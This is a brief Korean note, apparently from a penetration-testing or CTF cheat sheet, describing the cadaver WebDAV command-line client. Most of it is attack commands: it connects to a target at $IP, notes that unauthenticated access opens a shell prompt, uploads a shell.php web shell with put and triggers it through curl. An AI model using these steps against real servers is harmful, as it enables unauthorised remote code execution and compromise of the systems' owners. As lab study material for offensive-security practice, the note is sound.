`cadaver`는 CLI 기반 `WebDAV` 클라이언트다. ```plaintext cadaver http://$IP or cadaver http://$IP/webdav - 접속하면 계정/비밀번호를 입력하라는 메시지가 나올 수 있다. - 인증 없이 접근 가능하다면 바로 쉘 프롬프트 (dav:/webdav/>)가 열림 cadaver http://$IP put shell.php quit curl http://$IP/shell.php ```